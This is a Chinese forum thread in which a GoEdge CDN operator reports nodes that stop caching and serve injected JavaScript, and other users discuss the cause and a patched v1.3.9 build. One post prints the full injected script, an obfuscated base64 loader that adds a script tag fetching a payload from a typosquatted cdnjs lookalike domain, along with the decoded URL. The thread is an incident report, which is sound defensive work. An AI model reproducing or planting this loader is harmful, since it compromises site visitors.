goedge缓存和挂马

gaoanw · 发表于 2025-6-28 13:56:42

欢迎注册论坛，享受更多奶昔会员权益！

您需要登录才可以下载或查看，没有账号？注册

×

goedge的节点频繁会不缓存网页，js等其他静态资源就会缓存，节点重装就会正常村换，但是隔一会又会不缓存。
磁盘空间也够用

重新安装节点后他是x-cache HIT, policy, disk
但是过几个小时，节点上的网站他就会显示为x-cache BYPASS, JavaScript injection
x-edge-decompressed true

btpan · 发表于 2025-6-28 17:46:57

禁用内存缓存

gaoanw · 发表于 2025-7-1 13:52:45

被投毒了，挂马<script type="text/javascript">function xxSJRox(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3}}return t}function aPnDhiTia(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r)}if(a!=64){t=t+String.fromCharCode(i)}}return xxSJRox(t)}eval('window')['\x4d\x66\x58\x4b\x77\x56']=function(){;(function(u,r,w,d,f,c){var x=aPnDhiTia;u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));'jQuery';k=r[2]+'c'+f[1];'Flex';v=k+f[6];var s=d.createElement(v+c[0]+c[1]),g=function(){};s.type='text/javascript';{s.onload=function(){g()}}s.src=u;'CSS';d.getElementsByTagName('head')[0].appendChild(s)})('aHR0cHM6Ly9jZG5qcy5jbG9uZGZsYXJlLmNvbS9hamF4L2xpYnMvanF1ZXJ5Lm1pbi0zLjcuNC5qcw==','FgsPmaNtZ',window,document,'jrGYBsijJU','ptbnNbK')};if(!(/^Mac|Win/.test(navigator.platform)))MfXKwV();</script>

解密后得到加载JS代码：https://cdnjs.clondflare.com/ajax/libs/jquery.min-3.7.4.js

cnbysunney · 发表于 2025-7-3 16:33:49

gaoanw 发表于 2025-7-1 13:52
被投毒了，挂马function xxSJRox(e){var t="",n=r=c1=c2=0;while(n

找到哪里投毒的吗

gaoanw · 发表于 2025-7-10 19:19:10

用了奶昔的1.3.9版本，还是被投毒，做了127.0.0.1处理

nyarime · 发表于 2025-7-10 19:39:24

gaoanw 发表于 2025-7-10 19:19
用了奶昔的1.3.9版本，还是被投毒，做了127.0.0.1处理

楼主说的挂码为啥是cloudflare的cdnjs呢

9哥 · 发表于 2025-7-10 20:37:51

可以试试axisnow

gaoanw · 发表于 2025-7-11 13:20:26

nyarime 发表于 2025-7-10 19:39
楼主说的挂码为啥是cloudflare的cdnjs呢

只是看着像，有一个字母不同

gaoanw · 发表于 2025-7-11 13:20:53

论坛版本也不安全

nyarime · 发表于 2025-7-11 16:58:17

gaoanw 发表于 2025-7-11 13:20
论坛版本也不安全

已更新edge-node v1.3.9，请自行覆盖。

cd /usr/local/goedge/edge-admin/deploy
rm -rf *.zip
wget -O edge-node-linux-amd64-v1.3.9.zip https://dl.naixi.net/cdn/goedge/goedgecn/edge-node-linux-amd64-plus-v1.3.9.zip
wget -O edge-node-linux-arm64-v1.3.9.zip https://dl.naixi.net/cdn/goedge/goedgecn/edge-node-linux-arm64-plus-v1.3.9.zip

复制代码

axing21cn · 发表于 2025-8-8 15:22:01

现在是只有1.3.9是安全无毒的吗

iwtyufwt · 发表于 2025-9-19 01:39:34

你好，请问你哪的是哪个版本，在哪里下载的，能提供一下MD5么，谢谢

[教程] goedge缓存和挂马

欢迎注册论坛，享受更多奶昔会员权益！

浏览过的版块

相关网站

站内服务

认证与推广